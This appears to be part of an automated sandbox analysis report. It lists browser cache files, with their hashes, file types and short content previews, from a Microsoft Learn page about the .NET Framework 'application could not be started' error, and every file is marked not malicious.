Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.016149588804727
Encrypted:	false
SSDEEP:	768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:	1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:	5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:	36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	downloaded
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	downloaded
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! 